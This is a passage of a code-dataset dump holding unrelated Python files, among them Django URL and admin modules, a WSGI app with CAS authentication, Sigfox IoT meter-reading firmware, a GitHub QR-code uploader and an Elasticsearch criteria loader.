import views\n\nurlpatterns = [\n url(r'^$', views.charts_map, name='charts-map'),\n url(r'^most-requested[/]?$', views.most_requested, name='most-requested'),\n url(r'^most-requested-with-status[/]?$', views.most_requested_with_status, name='most-requested-with-status'),\n url(r'^most-bytes[/]?$', views.most_bytes, name='most-bytes'),\n url(r'^most-bytes-average[/]?$', views.most_bytes_average, name='most-bytes-average'),\n url(r'^most-used-bytes[/]?$', views.most_used_bytes, name='most-used-bytes'),\n url(r'^most-used-bytes-average[/]?$', views.most_used_bytes_average, name='most-used-bytes-average'),\n url(r'^most-latency[/]?$', views.most_latency, name='most-latency'),\n url(r'^most-latency-average[/]?$', views.most_latency_average, name='most-latency-average'),\n url(r'^most-used-latency[/]?$', views.most_used_latency, name='most-used-latency'),\n url(r'^most-used-latency-average[/]?$', views.most_used_latency_average, name='most-used-latency-average'),\n url(r'^requests-by-date[/]?$', views.requests_by_date, name='requests-by-date'),\n url(r'^used-bytes-average-by-date[/]?$', views.used_bytes_average_by_date, name='used-bytes-average-by-date'),\n url(r'^used-bytes-avg-min-max-by-date[/]?$', views.used_bytes_avg_min_max_by_date,\n name='used-bytes-avg-min-max-by-date'),\n url(r'^used-latency-average-by-date[/]?$', views.used_latency_average_by_date, name='used-latency-average-by-date'),\n url(r'^used-latency-avg-min-max-by-date[/]?$', views.used_latency_avg_min_max_by_date,\n name='used-latency-avg-min-max-by-date'),\n # url(r'^products/', include('resource.product.urls')),\n]\n","sub_path":"django_usage/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"260018087","text":"import wsgi_server\nimport os\nfrom werkzeug.wsgi import SharedDataMiddleware\nfrom cas import CASMiddleware\nimport logging\nfrom werkzeug.contrib.sessions import FilesystemSessionStore\nfrom werkzeug.wrappers import Response\n\n#logging.basicConfig(level=logging.DEBUG)\n\n#This function is called if:\n# Not authenticated\n# the ignore_redirect regex matches the (full) url pattern\ndef ignored_callback(environ, start_response):\n response = Response('{\"Error\":\"NotAuthenticated\"}')\n# response.status = '401 Unauthorized'\n response.status = '200 OK'\n response.headers['Content-Type'] = 'application/json'\n\n return response(environ, start_response)\n\napplication = wsgi_server.application\n\napplication = SharedDataMiddleware(application, {\n '/static': os.path.join(os.path.dirname(__file__), 'static')\n})\n\n#The URL of your CAS server - if this is set then CAS will be enabled\n# e.g. 
https://mydomain/cas\nCAS_SERVICE = ''\n#This is the CAS protocol version versions 2 and 3 supported (3 is only available in CAS 4)\nCAS_VERSION = 3\n#A URL to use as the link to logout\nCAS_LOGOUT_PAGE = '/logout'\n#Where to go when you've logged out - will send you to the entry page if not set\nCAS_LOGOUT_DESTINATION = ''\n#A page to show if validation fails\nCAS_FAILURE_PAGE = None\n\nif CAS_SERVICE != '':\n    fs_session_store = FilesystemSessionStore()\n    application = CASMiddleware(application, cas_root_url = CAS_SERVICE, logout_url = CAS_LOGOUT_PAGE, logout_dest = CAS_LOGOUT_DESTINATION, protocol_version = CAS_VERSION, casfailed_url = CAS_FAILURE_PAGE, entry_page = '/static/main.html', session_store = fs_session_store, ignore_redirect = '(.*)\\?datatype=', ignored_callback = ignored_callback)\n\n","sub_path":"wsgi_app/wsgi_static.py","file_name":"wsgi_static.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"92505957","text":"\nfrom network import WLAN\nimport machine\nimport time\nfrom machine import I2C\nfrom machine import SPI\nfrom machine import Pin\nfrom network import Sigfox\nimport socket\nimport ssd1306\nimport pycom\n\npycom.wifi_on_boot(False)\n\n#wlan=WLAN()\n#wlan.deinit()\n\n#OLED display reset #bugfix Random Pixels\nrst_oled=machine.Pin('P23',Pin.OUT)\nrst_oled.value(0)\ntime.sleep_ms(1000)\nrst_oled.value(1)\ntime.sleep_ms(2000)\nspi=SPI(0,mode=SPI.MASTER, baudrate=9600, pins=('P2','P3','P4'))\n#spi = machine.SPI(1, baudrate=31250, sck=machine.Pin('P5'), mosi=machine.Pin('P6'),miso=machine.Pin('P7'))\ni2c=I2C(0,pins=('P9','P10'))#scl=machine.Pin(10),sda=machine.Pin(9)) #D0,D1\noled=ssd1306.SSD1306_I2C(128,64,i2c,addr=i2c.scan()[0])\n\noled.fill(1)\noled.show()\ntime.sleep_ms(200)\noled.fill(0)\noled.show()\n\ndef get_reading():\n    result=''\n    buffer=[]\n    read=b''\n    spi_request=machine.Pin('P4',Pin.OUT)\n    spi_request.value(0)\n    time.sleep_ms(10)\n    spi_request.value(1)\n    time.sleep_ms(10)\n    spi=SPI(0,mode=SPI.MASTER, baudrate=9600, pins=('P2','P3','P4'))\n    read=spi.read(1)\n    while read!=b'\\x7A' and read!=b'\\xff' and read!=b'\\x00':\n        #time.sleep_ms(1)\n        if read!=b'\\x00':\n            try:\n                buffer.append(read.decode())\n            except Exception as e:\n                pass\n        else:\n            break\n        read=spi.read(1)\n    if buffer!=[]:\n        try:\n            result=int(\"\".join([str(l) for l in buffer]))\n        except Exception as e:\n            pass\n    else:\n        result='z'\n    return result\n\nsigfox = Sigfox(mode=Sigfox.SIGFOX, rcz=Sigfox.RCZ2)\ns = socket.socket(socket.AF_SIGFOX, socket.SOCK_RAW)\ns.setblocking(True)\ns.setsockopt(socket.SOL_SIGFOX, socket.SO_RX, False)\n\nbattery_level=80\nadc=machine.ADC()\napin=adc.channel(pin='P17',attn=adc.ATTN_2_5DB)\n\nwhile True:\n    result=get_reading()\n    if result!='z':\n        try:\n            data=hex(result)\n            data=data[2:]\n            s.send(data)\n            print(data)\n            result=result*0.05\n\n            strL0=\"Consumo: \"\n            strL1=str(result) + \" m3\"\n            #strL2=\"Serv_Stat: \"+\"True\" if connection_status==True else \"Serv_Stat: \"+\"False\"\n            #strL3=\"Wifi_Stat: \"+\"True\" if wlan.isconnected() else \"Wifi_Stat: \"+\"False\"\n            battery_level=0\n            for i in range(100):\n                battery_level=battery_level+apin.voltage()\n            battery_level=battery_level/1100\n            strL4=\"Battery: \"+str(round(battery_level,2))+\"%\"\n            oled.fill(0)\n            oled.show()\n            oled.text(strL0,0,0,1)\n            oled.text(strL1,0,10,1)\n            #oled.text(strL2,0,20,1)\n            #oled.text(strL3,0,30,1)\n            oled.text(strL4,0,40,1)\n            oled.show()\n        except Exception as e:\n            print(e)\n        print(\"Message sent\")\n        time.sleep(120)\n","sub_path":"Atom-SiPy/SPI_Test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"326603392","text":"from django.conf import settings\nfrom django.conf.urls import patterns, include, url\nfrom django.views.generic import TemplateView\nfrom applications.org_structure.views import UserProfileListView, SympaLoginView, SympaLogoutView, handler403, handler404, handler500\nfrom applications.report.views import dashboard\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n    # Examples:\n    # url(r'^$', 'project.views.commercial', name='commercial'),\n    # url(r'^project/', include('project.foo.urls')),\n\n    # Uncomment the admin/doc line below to enable admin documentation:\n    # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\t\n\t# (r'^static/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.STATIC_ROOT}),\n    url(r'^$', UserProfileListView.as_view(), name='home'), # UserProfileListView.as_view() dashboard\n\turl(r'^static/(?P<path>.*)$', 'django.views.static.serve', { 'document_root': settings.STATIC_ROOT, }),\n    url(r'^media/(?P<path>.*)$', 'django.views.static.serve', { 'document_root': settings.MEDIA_ROOT, }),\n\n    (r'^geolocalization/', include('applications.geo_location.urls')),\n    (r'^org_structure/',include('applications.org_structure.urls')),\n    (r'^org_pfa/',include('applications.org_pfa.urls')),\n    (r'^report/',include('applications.report.urls')),\n\n    # Uncomment the next line to enable the admin:\n    url(r'^admin/', include(admin.site.urls)),\n    #url(r'^login/$', 'django.contrib.auth.views.login',{'template_name': 'login/signin.html'}),\n    #url(r'^logout/$', 'django.contrib.auth.views.logout'),\n    (r'^tinymce/', include('tinymce.urls')),\n\n    url(r'^login/$', SympaLoginView.as_view() , name=\"login\"),\n    url(r'^logout/$', SympaLogoutView.as_view(), name=\"logout\"),\n\n    url(r'^500/$',TemplateView.as_view(template_name='500.html'), name='error_500' ),\n    url(r'^404/$',TemplateView.as_view(template_name='404.html'), name='error_404' ),\n    url(r'^403/$',TemplateView.as_view(template_name='403.html'), name='error_403' ),\n\n\n)\n","sub_path":"sympa/sympa/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"136547923","text":"from github import Github\nimport qrcode\nimport os\n\ntoken = 'INSERT HERE YOUR GITHUB ACCESS TOKEN'\ng = Github(token)\n\ndef GerarQrCode(cpf):\n    imagem_qrcode = qrcode.make(cpf)\n    imagem_qrcode.save(str(cpf)+'.png')\n    repo = g.get_user().get_repo(\"moreDevs2Blu\")\n    all_files = []\n    contents = repo.get_contents(\"\")\n    while contents:\n        file_content = contents.pop(0)\n        if file_content.type == \"dir\":\n            contents.extend(repo.get_contents(file_content.path))\n        else:\n            file = file_content\n            all_files.append(str(file).replace('ContentFile(path=\"','').replace('\")',''))\n\n    image = open(str(cpf)+'.png', 'rb')\n    content = image.read()\n\n    # Upload to github\n    git_file = str(cpf)+'.png'\n    if git_file in all_files:\n        contents = repo.get_contents(git_file)\n        repo.update_file(contents.path, \"committing files\", content, contents.sha, branch=\"main\")\n        image.close()\n        os.remove(str(cpf)+'.png')\n        return \"https://vinicios-tribess.github.io/moreDevs2Blu/\" + str(cpf) + '.png'\n    else:\n        repo.create_file(git_file, 
\"committing files\", content, branch=\"main\")\n image.close()\n os.remove(str(cpf)+'.png')\n return \"https://vinicios-tribess.github.io/moreDevs2Blu/\" + str(cpf) + '.png'","sub_path":"Agendamento/QrCode.py","file_name":"QrCode.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"603749193","text":"import numpy as np\nimport pandas as pd\nimport ntpath\n\nimport os\n\n\ndef split_path_name(path):\n# print(ntpath.split(path))\n head, tail = ntpath.split(path)\n if tail == '':\n return ntpath.split(head)\n else:\n return head, tail\n \n\nclass IfsHolderBasic(object):\n \n def __init__(self, path_file_csv, path_file_config=None):\n self.df_ifs = pd.read_csv(path_file_csv)\n# names=['id', 'label', 'mu', 'nu'],\n# index_col='id')\n self.base_path, self.file_name = split_path_name(path_file_csv)\n self.full_path = os.path.join(self.base_path, self.file_name)\n if path_file_config is not None:\n self.df_config = pd.read_csv(path_file_config, \n index_col=False)\n# self.mus = np.asarray(df_ifs['mu'], dtype=float)\n# self.nus = np.asarray(df_ifs['nu'], dtype=float)\n# self.id = np.asarray(df_ifs['id'], dtype=int)\n \n @property\n def get_mus(self):\n return np.asarray(self.df_ifs['mu'].astype(float), dtype=float)\n \n @property\n def get_nus(self):\n return np.asarray(self.df_ifs['nu'].astype(float), dtype=float)\n \n @property\n def get_idx(self):\n return np.asarray(self.df_ifs.index.astype(int), dtype=int)\n\n \n def set_ifs(self, mus, nus, idx, path_file=None):\n# path = path_file if path_file is not None else self.full_path\n assert(len(idx)==len(mus)==len(nus))\n dic = {'mu': np.asarray(mus, dtype=float),\n 'nu': np.asarray(nus, dtype=float)}\n self.df_ifs = pd.DataFrame(dic, index=idx)\n \n if path_file is not None:\n self.df_ifs.to_csv(path_file, sep=',', index=True)\n \n def set_conf(self, dic, path_config):\n self.df_config.to_csv(dic)\n\n\n\nif __name__ == '__main__':\n# from ifs_holder_basic import IfsHolderBasic\n filepath = os.path.join(os.getcwd() , 'ifsholder/ifs_holder.csv')\n\n ifs_basic = IfsHolderBasic(filepath,\n None)\n print(ifs_basic.get_mus)\n# print(ifs_basic.df_ifs)","sub_path":"ifs_holder_basic.py","file_name":"ifs_holder_basic.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"136315377","text":"from elastic.management.loaders.loader import JSONLoader, MappingProperties\nimport requests\nimport logging\n\n# Get an instance of a logger\nlogger = logging.getLogger(__name__)\n\n\nclass CriteriaManager(JSONLoader):\n\n def create_criteria(self, **options):\n ''' Create alias index mapping and load data '''\n idx_name = self.get_index_name(**options)\n idx_types = self.get_index_type(**options)\n mart_project = self.get_project(**options)\n\n for idx_type in idx_types:\n logger.warn('idx name ' + idx_name)\n logger.warn('idx_type' + idx_type)\n logger.warn('project name ' + mart_project)\n mart_url = 'https://mart.' 
+ mart_project + '.org/biomart/martservice?'\n # mart_url = 'https://mart-dev-imb/biomart/martservice?'\n mart_object = self.get_object_type(idx_type)\n logger.warn('mart_project ' + mart_project + ' mart_object ' + mart_object)\n mart_dataset = mart_project + '_criteria_' + mart_object\n criteria_json = self.get_criteria_info_from_biomart(mart_url, mart_dataset, idx_type, **options)\n processed_criteria_json = self._post_process_criteria_info(criteria_json, **options)\n self._create_criteria_mapping(**options)\n self.load(processed_criteria_json, idx_name, idx_type)\n\n def _create_criteria_mapping(self, **options):\n ''' Create the mapping for alias indexing '''\n idx_types = self.get_index_type(**options)\n\n for idx_type in idx_types:\n props = self.get_properties(idx_type, **options)\n self.mapping(props, idx_type=idx_type, meta=None, analyzer=self.KEYWORD_ANALYZER, **options)\n\n def _post_process_criteria_info(self, criteria_json, **options):\n doc = []\n for row in criteria_json['data']:\n current_row = self.process_row(row, **options)\n doc.append(current_row)\n return doc\n\n def process_row(self, row, **options):\n current_row = {}\n current_row['Name'] = row['Name']\n current_row['Primary id'] = row['Primary id']\n current_row['Object class'] = row['Object class']\n current_row['Total score'] = row['Total score']\n for org in self.get_organism_enabled(**options):\n for dis in self.get_diseases_enabled(**options):\n dis_org_header = dis + '_' + org\n score_key = dis + ' ' + org + ' score'\n score_key = score_key.strip()\n\n flag_key = dis + ' ' + org + ' flag'\n flag_key = flag_key.strip()\n\n current_row_score = None\n current_row_flag = None\n\n if score_key in row:\n current_row_score = row[score_key]\n\n if flag_key in row:\n current_row_flag = row[flag_key]\n\n if current_row_score is None or len(current_row_score) == 0:\n current_row_score = '0'\n\n if current_row_flag is None or len(current_row_flag) == 0:\n current_row_flag = '0'\n\n if current_row_score is not None and current_row_flag is not None:\n current_row_score_flag = current_row_score + ':' + current_row_flag\n current_row[dis_org_header] = current_row_score_flag\n\n return current_row\n\n def get_properties(self, idx_type, **options):\n ''' Create the mapping for criteria index '''\n props = MappingProperties(idx_type)\n props.add_property(\"Name\", \"string\", analyzer=\"full_name\")\n props.add_property(\"Primary id\", \"string\", index=\"not_analyzed\")\n props.add_property(\"Total score\", \"string\", index=\"no\")\n dis_orgs = self.get_dis_orgs(**options)\n for dis_org in dis_orgs:\n props.add_property(dis_org, \"string\", index=\"no\")\n\n return props\n\n def get_organism_enabled(self, **options):\n project = self.get_project(**options)\n if(project == \"immunobase\"):\n return ['Hs']\n elif(project == \"t1dbase\"):\n return ['Hs', 'Mm', 'Rn']\n\n return ['Hs']\n\n def get_diseases_enabled(self, **options):\n project = self.get_project(**options)\n if(project == \"immunobase\"):\n return sorted(['AS', 'ATD', 'CEL', 'CRO', 'JIA', 'MS', 'PBC', 'PSO', 'RA', 'SLE', 'T1D', 'UC', 'OD'])\n elif(project == \"t1dbase\"):\n return ['T1D']\n\n return sorted(['AS', 'ATD', 'CEL', 'CRO', 'JIA', 'MS', 'PBC', 'PSO', 'RA', 'SLE', 'T1D', 'UC', 'OD'])\n\n def get_dis_orgs(self, **options):\n dis_orgs = []\n orgs_enabled = self.get_organism_enabled(**options)\n dis_enabled = self.get_diseases_enabled(**options)\n for dis in dis_enabled:\n for org in orgs_enabled:\n dis_orgs.append(dis + '_' + org)\n return 
sorted(dis_orgs)\n\n def get_object_type(self, idx_type):\n ''' Get object type '''\n if(idx_type == 'gene'):\n return 'genes'\n if(idx_type == 'locus'):\n return 'regions'\n if(idx_type == 'marker'):\n return 'markers'\n if(idx_type == 'study'):\n return 'studies'\n\n def get_index_type(self, **options):\n ''' Get indexType option '''\n idx_type = []\n if options['indexType']:\n idx_type.append(options['indexType'].lower())\n else:\n idx_type.extend(['gene', 'locus', 'marker', 'study'])\n return idx_type\n\n def get_project(self, **options):\n '''return project name'''\n if options['indexProject']:\n return options['indexProject'].lower()\n else:\n return \"immunobase\"\n\n def get_criteria_info_from_biomart(self, mart_url, mart_dataset, idx_type, **options):\n urlTemplate = \\\n mart_url + \\\n 'query=' \\\n '' \\\n '' \\\n '' \\\n '' \\\n '' \\\n '' \\\n\n flag_query = ''\n for dis_org in self.get_dis_orgs(**options):\n flag_query += ''\n flag_query += ''\n\n urlTemplate += flag_query\n\n if(options['applyFilter']):\n filter_value = ''\n if(idx_type == 'gene'):\n filter_value = 'ptpn22'\n elif(idx_type == 'locus'):\n filter_value = '1p13.2'\n elif(idx_type == 'marker'):\n filter_value = 'rs2476601'\n elif(idx_type == 'study'):\n filter_value = 'barrett'\n\n filter_query = ''\n urlTemplate += filter_query\n\n urlTemplate += '' + ''\n queryURL = urlTemplate\n req = requests.get(queryURL, stream=True, verify=False)\n return req.json()\n","sub_path":"elastic/management/loaders/criteria.py","file_name":"criteria.py","file_ext":"py","file_size_in_byte":7388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"492100060","text":"class Duree:\n def __init__(self,heure,minute,seconde):\n self.__heure=heure\n self.__minute=minute\n self.__seconde=seconde\n\n def __str__(self):\n if self.__minute>59:\n nb=self.__minute//60\n self.__heure+=nb\n self.__minute-=nb*60\n if self.__seconde>59:\n nb=self.__seconde//60\n self.__minute+=nb\n self.__seconde-=nb*60\n return str(self.__heure)+\"h\"+str(self.__minute)+\"m\"+str(self.__seconde)+'s'\n\n def __add__(self, other):\n return Duree(self.__heure+other.__heure,self.__minute+other.__minute,self.__seconde+other.__seconde)\n\nif __name__== '__main__':\n D1=Duree(5,20,6)\n D2=Duree(6,50,66)\n D3=D1+D2\n print(D1)\n print(D3)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"229660746","text":"import numpy as np\n\n\ndef mean_average_precision(gt_list, pred_list, confidence_score=True, classes=[\"car\"]):\n \"\"\"\n Mean Average Precision calculation\n Parameters:\n gt_list: [[Detection,...],...]\n pred_list: [[Detection,...],...]\n confidence_score: indicates the method to compute the map\n classes: indicates the classes of the dataset\n \"\"\"\n\n precs = []\n recs = []\n aps = []\n for c in classes:\n gt_list_class = [[det for det in boxlist if det.label == c] for boxlist in gt_list]\n pred_list_class = [[det for det in boxlist if det.label == c] for boxlist in pred_list]\n ap, prec, rec = average_precision(gt_list_class, pred_list_class, confidence_score)\n precs.append(prec)\n recs.append(rec)\n aps.append(ap)\n prec = np.mean(precs)\n rec = np.mean(recs)\n map = np.mean(aps)\n\n return map, prec, rec\n\n\ndef average_precision(gt_list, pred_list, confidence_score=True):\n \"\"\"\n Average Precision with or without confidence scores.\n Params:\n gt_list: 
[[Detection,...],...]\n pred_list: [[Detection,...],...]\n \"\"\"\n\n pred_list = [(i, det) for i in range(len(pred_list)) for det in pred_list[i]]\n if len(pred_list) == 0:\n return 0\n\n if confidence_score :\n sorted_ind = np.argsort([-det[1].score for det in pred_list])\n pred_list_sorted = [pred_list[i] for i in sorted_ind]\n ap, prec, rec = voc_ap(gt_list, pred_list_sorted)\n else:\n n = 10\n precs = []\n recs = []\n aps = []\n for _ in range(n):\n shuffled_ind = np.random.permutation(len(pred_list))\n pred_list_shuffled = [pred_list[i] for i in shuffled_ind]\n ap, prec, rec = voc_ap(gt_list, pred_list_shuffled)\n precs.append(prec)\n recs.append(rec)\n aps.append(ap)\n prec = np.mean(precs)\n rec = np.mean(recs)\n ap = np.mean(aps)\n return ap, prec, rec\n\n\n# Below code is adapted from\n# https://github.com/facebookresearch/detectron2/blob/master/detectron2/evaluation/pascal_voc_evaluation.py\n\ndef voc_ap(gt_list, pred_list, ovthresh=0.5):\n \"\"\"\n Average Precision as defined by PASCAL VOC (11-point tracking).\n Params:\n gt_list: [[Detection,...],...]\n pred_list: [Detection,...]\n ovthresh: overlap threshold.\n \"\"\"\n\n class_recs = []\n npos = 0\n for R in gt_list:\n bbox = np.array([det.bbox for det in R])\n det = [False] * len(R)\n npos += len(R)\n class_recs.append({\"bbox\": bbox, \"det\": det})\n\n image_ids = [det[0] for det in pred_list]\n BB = np.array([det[1].bbox for det in pred_list]).reshape(-1, 4)\n\n # go down dets and mark TPs and FPs\n nd = len(image_ids)\n tp = np.zeros(nd)\n fp = np.zeros(nd)\n for d in range(nd):\n R = class_recs[image_ids[d]]\n bb = BB[d, :].astype(float)\n ovmax = -np.inf\n BBGT = R[\"bbox\"].astype(float)\n\n if BBGT.size > 0:\n # compute overlaps\n overlaps = iou_vectorized(BBGT, bb[None, :])\n ovmax = np.max(overlaps)\n jmax = np.argmax(overlaps)\n\n if ovmax > ovthresh:\n if not R[\"det\"][jmax]:\n tp[d] = 1.0\n R[\"det\"][jmax] = 1\n else:\n fp[d] = 1.0\n else:\n fp[d] = 1.0\n\n # compute precision recall\n fp = np.cumsum(fp)\n tp = np.cumsum(tp)\n rec = tp / float(npos)\n # avoid divide by zero in case the first detection matches a difficult\n # ground truth\n prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)\n\n # compute VOC AP using 11 point metric\n ap = 0.0\n for t in np.arange(0.0, 1.1, 0.1):\n if np.sum(rec >= t) == 0:\n p = 0\n else:\n p = np.max(prec[rec >= t])\n ap = ap + p / 11.0\n\n return ap, prec, rec","sub_path":"W1/Adapted_voc_evaluation.py","file_name":"Adapted_voc_evaluation.py","file_ext":"py","file_size_in_byte":3887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"2307422","text":"from django import forms\nfrom django.contrib import admin\nfrom django.contrib.admin import helpers\nfrom django.contrib.admin.util import unquote\nfrom django.core.exceptions import PermissionDenied\nfrom django.db import transaction, models\nfrom django.forms.formsets import all_valid\nfrom django.http import Http404\nfrom django.utils.decorators import method_decorator\nfrom django.utils.encoding import force_unicode\nfrom django.utils.html import escape\nfrom django.utils.safestring import mark_safe\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.utils.translation import ugettext as _\nfrom catalog.forms import product_attributes_form_factory, build_initial_details\nfrom catalog.models import Catalog, Product, ProductAttribute, ProductDetail, CatalogCategory, Manufacturer, SmartFilter, ProductSmartFilter, ProductFilter\nfrom 
generic_images.admin import AttachedImagesInline\n\n__author__ = 'LittleJoe'\n\nclass CatalogAdmin(admin.ModelAdmin):\n list_display = ['name', 'slug']\n prepopulated_fields = {\"slug\": (\"name\",)}\nadmin.site.register(Catalog, CatalogAdmin)\n\n#\nclass ProductSmartFilterTabular(admin.TabularInline):\n model = ProductSmartFilter\n\ncsrf_protect_m = method_decorator(csrf_protect)\nclass ProductAdmin(admin.ModelAdmin):\n list_display = ['name', 'category', 'price', 'slug']\n prepopulated_fields = {\"slug\": (\"name\",)}\n inlines = [AttachedImagesInline, ProductSmartFilterTabular]\n\n class Media:\n js = ( \"base/js/category_select.js\",)# \"base/js/fill_smart_filters.js\")\n\n def save_model(self, request, obj, form, change):\n obj.save()\n return obj\n\n def get_form(self, request, obj=None, **kwargs):\n # just save obj reference for future processing in Inline\n request._obj_ = obj\n return super(ProductAdmin, self).get_form(request, obj, **kwargs)\n\n\n @csrf_protect_m\n @transaction.commit_on_success\n def add_view(self, request, form_url='', extra_context=None):\n \"The 'add' admin view for this model.\"\n model = self.model\n opts = model._meta\n\n if not self.has_add_permission(request):\n raise PermissionDenied\n\n ModelForm = self.get_form(request)\n formsets = []\n if request.method == 'POST':\n form = ModelForm(request.POST, request.FILES)\n\n #dirty hack\n attrs = ProductAttribute.objects.filter(category=request.POST.get('category'))\n AttrsForm = product_attributes_form_factory(attrs)\n attrs_form = AttrsForm(data=request.POST, prefix='attrs')\n #-----------\n\n if form.is_valid() and attrs_form.is_valid():\n new_object = self.save_form(request, form, change=False)\n form_validated = True\n else:\n form_validated = False\n new_object = self.model()\n prefixes = {}\n for FormSet, inline in zip(self.get_formsets(request), self.inline_instances):\n prefix = FormSet.get_default_prefix()\n prefixes[prefix] = prefixes.get(prefix, 0) + 1\n if prefixes[prefix] != 1:\n prefix = \"%s-%s\" % (prefix, prefixes[prefix])\n formset = FormSet(data=request.POST, files=request.FILES,\n instance=new_object,\n save_as_new=\"_saveasnew\" in request.POST,\n prefix=prefix, queryset=inline.queryset(request))\n formsets.append(formset)\n if all_valid(formsets) and form_validated:\n prod_obj = self.save_model(request, new_object, form, change=False)\n form.save_m2m()\n\n #hack again\n attrs_form.save(prod_obj)\n #---------\n for formset in formsets:\n self.save_formset(request, form, formset, change=False)\n\n self.log_addition(request, new_object)\n return self.response_add(request, new_object)\n else:\n # Prepare the dict of initial data from the request.\n # We have to special-case M2Ms as a list of comma-separated PKs.\n initial = dict(request.GET.items())\n for k in initial:\n try:\n f = opts.get_field(k)\n except models.FieldDoesNotExist:\n continue\n if isinstance(f, models.ManyToManyField):\n initial[k] = initial[k].split(\",\")\n form = ModelForm(initial=initial)\n prefixes = {}\n for FormSet, inline in zip(self.get_formsets(request),\n self.inline_instances):\n prefix = FormSet.get_default_prefix()\n prefixes[prefix] = prefixes.get(prefix, 0) + 1\n if prefixes[prefix] != 1:\n prefix = \"%s-%s\" % (prefix, prefixes[prefix])\n formset = FormSet(instance=self.model(), prefix=prefix,\n queryset=inline.queryset(request))\n formsets.append(formset)\n\n #hack again\n attrs = ProductAttribute.objects.filter(category=0)\n AttrsForm = product_attributes_form_factory(attrs)\n attrs_form = 
AttrsForm(data=request.POST, prefix='attrs')\n #------------\n\n adminForm = helpers.AdminForm(form, list(self.get_fieldsets(request)),\n self.prepopulated_fields, self.get_readonly_fields(request),\n model_admin=self)\n media = self.media + adminForm.media\n\n inline_admin_formsets = []\n for inline, formset in zip(self.inline_instances, formsets):\n fieldsets = list(inline.get_fieldsets(request))\n readonly = list(inline.get_readonly_fields(request))\n inline_admin_formset = helpers.InlineAdminFormSet(inline, formset,\n fieldsets, readonly, model_admin=self)\n inline_admin_formsets.append(inline_admin_formset)\n media = media + inline_admin_formset.media\n\n context = {\n 'title': _('Add %s') % force_unicode(opts.verbose_name),\n 'adminform': adminForm,\n 'is_popup': \"_popup\" in request.REQUEST,\n 'show_delete': False,\n 'media': mark_safe(media),\n 'inline_admin_formsets': inline_admin_formsets,\n 'errors': helpers.AdminErrorList(form, formsets),\n 'root_path': self.admin_site.root_path,\n 'app_label': opts.app_label,\n 'attrs_form': attrs_form,\n 'load_attrs_form': request.method == 'GET',\n }\n context.update(extra_context or {})\n return self.render_change_form(request, context, form_url=form_url, add=True)\n\n\n @csrf_protect_m\n @transaction.commit_on_success\n def change_view(self, request, object_id, extra_context=None):\n \"The 'change' admin view for this model.\"\n model = self.model\n opts = model._meta\n\n obj = self.get_object(request, unquote(object_id))\n\n if not self.has_change_permission(request, obj):\n raise PermissionDenied\n\n if obj is None:\n raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {'name': force_unicode(opts.verbose_name), 'key': escape(object_id)})\n\n if request.method == 'POST' and \"_saveasnew\" in request.POST:\n return self.add_view(request, form_url='../add/')\n\n ModelForm = self.get_form(request, obj)\n formsets = []\n if request.method == 'POST':\n form = ModelForm(request.POST, request.FILES, instance=obj)\n\n #dirty hack\n attrs = ProductAttribute.objects.filter(category=request.POST.get('category'))\n details = ProductDetail.objects.filter(product=obj)\n AttrsForm = product_attributes_form_factory(attrs)\n attrs_form = AttrsForm(data=request.POST, prefix='attrs')\n #-----------\n\n if form.is_valid() and attrs_form.is_valid():\n form_validated = True\n new_object = self.save_form(request, form, change=True)\n else:\n form_validated = False\n new_object = obj\n prefixes = {}\n for FormSet, inline in zip(self.get_formsets(request, new_object),\n self.inline_instances):\n prefix = FormSet.get_default_prefix()\n prefixes[prefix] = prefixes.get(prefix, 0) + 1\n if prefixes[prefix] != 1:\n prefix = \"%s-%s\" % (prefix, prefixes[prefix])\n formset = FormSet(request.POST, request.FILES,\n instance=new_object, prefix=prefix,\n queryset=inline.queryset(request))\n\n formsets.append(formset)\n\n if all_valid(formsets) and form_validated:\n prod_obj = self.save_model(request, new_object, form, change=True)\n form.save_m2m()\n\n #hack again\n attrs_form.update(prod_obj, details)\n #---------\n\n for formset in formsets:\n self.save_formset(request, form, formset, change=True)\n\n change_message = self.construct_change_message(request, form, formsets)\n self.log_change(request, new_object, change_message)\n return self.response_change(request, new_object)\n\n else:\n form = ModelForm(instance=obj)\n prefixes = {}\n for FormSet, inline in zip(self.get_formsets(request, obj), self.inline_instances):\n prefix = 
